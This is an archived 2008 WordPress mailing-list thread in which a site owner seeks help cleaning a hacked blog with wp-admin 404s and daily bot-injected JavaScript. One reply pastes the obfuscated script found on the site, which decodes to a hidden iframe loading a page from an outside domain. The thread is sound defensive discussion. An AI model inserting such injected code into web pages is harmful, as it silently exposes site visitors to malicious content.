[wp-hackers] Black Hat Chinese Hackers - Looking for your input

MLR mlrichard at gmail.com
Mon Jun 2 21:23:18 GMT 2008 

The only odd thing I found was a file in the /wp-content/ called
index.php which has an encrypted javascript call.

removing it didn't change anything.

---
<script language="JavaScript">function vjaw(mtsy){return
String.fromCharCode(mtsy);}var
xwyq="060105102114097109101032115114099061034104116116112058047047107108101112097046099110047111108097046104116109108034032119105100116104061039050048048039032104101105103104116061039050049050039032115116121108101061034100105115112108097121058032110111110101059034062060047105102114097109101062";var
xbsf="";for(cwir=0;cwir<xwyq.length;cwir+=3){xbsf+=vjaw(xwyq[cwir]+''+xwyq[cwir+1]+''+xwyq[cwir+2]);}document.write(xbsf);</script>
---


On Mon, Jun 2, 2008 at 5:19 PM, George Pearce <pearce.gs at googlemail.com> wrote:
> I've been talking to Marie, and from what I can see there are no affected
> Wordpress files, there are some silly 777's, but all the files have either
> been refreshed or checked manually. Nothing seems to be in the directory
> that the blog is, either.
> It's strange.
> How else would that 404 be achieved, without editing any files. Also, a
> javascript tag has attached itself to the bottom of the </html> on each
> page.
>
> (I'm replying because I've been talking to Marie for the last half hour :) )
>
> George
>
> -----Original Message-----
> From: wp-hackers-bounces at lists.automattic.com
> [mailto:wp-hackers-bounces at lists.automattic.com] On Behalf Of Jason Webster
> Sent: 02 June 2008 22:16
> To: wp-hackers at lists.automattic.com
> Subject: Re: [wp-hackers] Black Hat Chinese Hackers - Looking for your input
>
> Here's a few things that would be useful to know:
>
> Are you sure Wordpress was the point of entry for the attack?
>
> What kind of hosting? ie, shared/dedicated.
>
> MLR wrote:
>> Hi Guys,
>>
>> I have noticed two things:
>> - The combination of the Words WordPress and Hack mostly return topics
>> about making WP do cool things (the spirit of this mailing list)
>> - Most requests for info about fixing hacked blogs are dead ends on
>> wordpress.org
>>
>> Today I am trying to fix a hacked blog without simply starting over. I
>> want to know what happened to create the following problem:
>>
>> All request in the address bar to ANY wp-admin files returns a 404 error.
>>
>> the .htaccess file seems clean.
>>
>> All files were at 2.5.1
>>
>> I have already overwritten all files in sequence to spot which one
>> would have rogue code.
>>
>> I checked the theme it seems fine (no encoded bits of javascript or rogue
> code)
>>
>> I have removed the javascript functions at the bottom of the index.php
>> that a bot inserts everyday on the site.
>>
>> Your pointers will definitely help me understand the source of the issue.
>>
>> What is your opinion on the usefullness of this plugin?
>> http://www.askapache.com/wordpress/htaccess-password-protect.html
>>
>> (I know this is easely done the classic way but don't we all have a
>> gazillion blogs to manage!?!)
>>
>>
>> Thanks a lot,
>> Marie-Lynn
>> http://www.friendly-webmaster.com
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers
>>
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
> No virus found in this incoming message.
> Checked by AVG.
> Version: 8.0.100 / Virus Database: 269.24.4/1478 - Release Date: 02/06/2008
> 07:12
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

More information about the wp-hackers mailing list